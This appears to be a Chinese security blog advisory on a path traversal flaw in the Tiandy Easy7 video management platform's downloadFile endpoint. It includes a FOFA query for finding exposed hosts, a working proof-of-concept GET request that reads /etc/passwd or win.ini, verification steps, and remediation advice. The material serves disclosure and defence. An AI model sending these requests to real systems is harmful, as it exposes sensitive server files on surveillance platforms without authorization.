天地伟业 Easy7 综合管理平台 downloadFile 接口存在任意文件读取漏洞

免责声明

         本文所提供的信息仅供安全研究和教育用途。请勿将文章内的技术用于非法测试。由于传播、利用本文所提供的信息或工具而造成的任何直接或间接后果及损失,均由使用者本人负责。本文作者不承担任何责任。该文章仅供授权的安全测试和学习用途使用。     

1. 系统概述

天地伟业 Easy7 视频综合管理平台是天地伟业公司推出的一款集视频监控、报警管理、门禁控制、电子地图等功能于一体的智能安防管理系统。该平台广泛应用于公安、交通、教育及大型园区等行业的安防监控场景,负责海量监控数据的管理与分发。

2. 漏洞详细信息

漏洞类型: 任意文件读取 / 路径遍历

危险等级:高危

漏洞描述: 天地伟业 Easy7 综合管理平台的 /Easy7/rest/file/downloadFile 接口在处理文件下载请求时,未对用户传入的 fileName 参数进行充分的安全校验和路径过滤。攻击者可以通过构造带有目录遍历字符(如 ../)的恶意 payload,突破 Web 根目录限制,读取服务器上的任意敏感系统文件或配置文件,从而导致严重的敏感信息泄露。

FOFA:

 app="Tiandy-Easy7"

3. 受影响版本

  • 天地伟业 Easy7 综合管理平台

POC验证代码

GET /Easy7/rest/file/downloadFile?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

4. 漏洞验证方法

1. 使用 FOFA 语法定位受影响的资产目标。 

2. 构造针对 /Easy7/rest/file/downloadFile 接口的 GET 请求。 

3. 将参数 fileName 设置为系统敏感文件的相对路径,例如 Linux 系统下的 ../../../../../../../../../../../../../../etc/passwd或Windows系统下的 ../../../../../../../../../../../../../../windows/win.ini。 

4. 若服务器响应 200 OK 且返回了对应的系统文件内容,则确认漏洞存在。

5. 修复建议

修复方案:

1. 对 downloadFile 接口的输入参数进行严格过滤,禁止出现 ..、/、\ 等目录遍历敏感字符。
2. 建议对下载路径进行白名单限制,仅允许访问预设的特定下载目录。
3. 使用文件 ID 映射机制代替直接传递文件名,即通过数据库 ID 获取对应路径,避免暴露物理路径信息。
4. 及时联系厂商天地伟业获取官方安全补丁或升级至最新安全版本。

您可能还喜欢...

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注